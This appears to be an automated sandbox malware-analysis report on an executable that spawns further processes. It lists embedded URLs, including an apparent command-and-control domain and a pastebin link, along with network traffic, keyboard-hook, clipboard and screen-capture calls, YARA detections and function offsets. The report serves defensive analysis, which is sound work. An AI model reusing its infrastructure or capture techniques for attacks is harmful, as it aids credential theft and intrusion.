                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593192466.000000000574F000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1557860288.0000000005A81000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593149411.00000000057A0000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593257030.0000000005723000.00000004.00000800.00020000.00000000.sdmp, LOK6C9E3IK9GW8BSQQ492.exe, 00000009.00000002.1705015435.0000000000423000.00000002.00000001.01000000.00000006.sdmp, LOK6C9E3IK9GW8BSQQ492.exe.3.drString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                  Source: powershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1701464795.00000000071EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1438577230.00000000056FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 0000001F.00000002.1694523421.0000000004A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: powershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: powershell.exe, 0000001F.00000002.1694523421.0000000004B66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1701464795.00000000071EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: Installer.exe, 0000001A.00000002.1666986072.0000000000F14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: powershell.exe, 0000001F.00000002.1698195418.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.00000000030E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003135000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1722768807.0000000003001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1722768807.00000000030D6000.00000004.00000800.00020000.00000000.sdmp, logs.uce.28.dr, logs.uce0.28.dr, logs.uce1.28.drString found in binary or memory: https://pastebin.com/raw/dq3hWX27
                  Source: PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1464300224.0000000003036000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463880713.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463858739.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/=
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1478060137.000000000301A000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595716134.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1464300224.0000000003036000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463880713.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1477879308.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463858739.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1489062497.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593349365.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/N
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/R
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1478060137.000000000301A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/SCvh
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595716134.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1464300224.0000000003036000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463880713.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1477879308.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463858739.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1489062497.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593349365.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/W
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1478060137.000000000301A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/aZCA1
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1422167219.0000000003016000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/api
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422167219.0000000003016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/apiA
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593568614.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595588307.0000000002FB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/apifEn
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1422167219.0000000003016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/apin
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/apit~
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000002.1595716134.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1464300224.0000000003036000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463835898.0000000003023000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463880713.0000000003034000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1477879308.0000000003039000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1463858739.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1489062497.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1593349365.000000000302F000.00000004.00000020.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1437998626.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/p
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/r
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pragapin.sbs/rJ
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1593438389.0000000003064000.00000004.00000020.00020000.00000000.sdmp, Installer.exe.24.dr, LOK6C9E3IK9GW8BSQQ492.exe.3.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.0000000003108000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001C.00000002.1722768807.000000000310C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                  Source: RegSvcs.exe, 0000001C.00000002.1722768807.000000000310C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1407856721.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407995164.0000000005716000.00000004.00000800.00020000.00000000.sdmp, PqSIlYOaIF.exe, 00000003.00000003.1407792261.0000000005719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439857444.0000000003042000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: PqSIlYOaIF.exe, 00000003.00000003.1439566849.0000000005805000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49808 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.39.3:443 -> 192.168.2.9:49824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.9:49927 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeCode function: 9_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,000000009_2_00408DBB
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00431690 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00431690
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00431690 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_00431690
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 3_2_00432037 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,3_2_00432037

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0000001A.00000002.1666398916.000000000063A000.00000004.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Source: Process Memory Space: Installer.exe PID: 7868, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                  Drops password protected ZIP file
                  Source: file.bin.9.drZip Entry: encrypted
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 13_2_00F996AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,13_2_00F996AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sys
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000B19100_2_000B1910
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000E4A100_2_000E4A10
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00064B900_2_00064B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0008D5B00_2_0008D5B0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000ADFE00_2_000ADFE0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_001048320_2_00104832
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000FE0320_2_000FE032
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000F60500_2_000F6050
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000D80700_2_000D8070
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000940800_2_00094080
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000A28800_2_000A2880
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0007F0C00_2_0007F0C0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000D30D00_2_000D30D0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000C30F00_2_000C30F0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000D19000_2_000D1900
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000C29200_2_000C2920
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0005513F0_2_0005513F
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000551440_2_00055144
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000BE1500_2_000BE150
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000B49670_2_000B4967
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000ED1700_2_000ED170
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000AC9D00_2_000AC9D0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000791E00_2_000791E0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000CF2000_2_000CF200
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000972100_2_00097210
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000A22200_2_000A2220
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000B4A210_2_000B4A21
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000C3A300_2_000C3A30
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000BD2460_2_000BD246
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0006325B0_2_0006325B
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000CCA700_2_000CCA70
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000AD2810_2_000AD281
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000AB2910_2_000AB291
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000F32A00_2_000F32A0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0009D2BE0_2_0009D2BE
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0011FAA90_2_0011FAA9
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000C72B00_2_000C72B0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000AD2D90_2_000AD2D9
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00068AD30_2_00068AD3
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000FCAD00_2_000FCAD0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000BA2E00_2_000BA2E0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000572FC0_2_000572FC
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000D3B000_2_000D3B00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000B931B0_2_000B931B
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0009D2BE0_2_0009D2BE
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000B93710_2_000B9371
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000CC38B0_2_000CC38B
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000983900_2_00098390
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00092B900_2_00092B90
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000AABCB0_2_000AABCB
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00087C1B0_2_00087C1B
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00115C090_2_00115C09
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000884170_2_00088417
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_001084500_2_00108450
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000A9C450_2_000A9C45
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0008846A0_2_0008846A
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000A9C450_2_000A9C45
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00098CB00_2_00098CB0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0009ECD00_2_0009ECD0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00066CE30_2_00066CE3
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000D75100_2_000D7510
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000C7D300_2_000C7D30
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0007ED620_2_0007ED62
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000ACD810_2_000ACD81
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0007ED620_2_0007ED62
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000565DC0_2_000565DC
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000635DD0_2_000635DD
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00057DDB0_2_00057DDB
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_0008D5FE0_2_0008D5FE
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000F46900_2_000F4690
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000B4EBB0_2_000B4EBB
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000B96DB0_2_000B96DB
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000F06D00_2_000F06D0
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_00092F000_2_00092F00
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000CC7220_2_000CC722
                  Source: C:\Users\user\Desktop\PqSIlYOaIF.exeCode function: 0_2_000B3F300_2_000B3F30
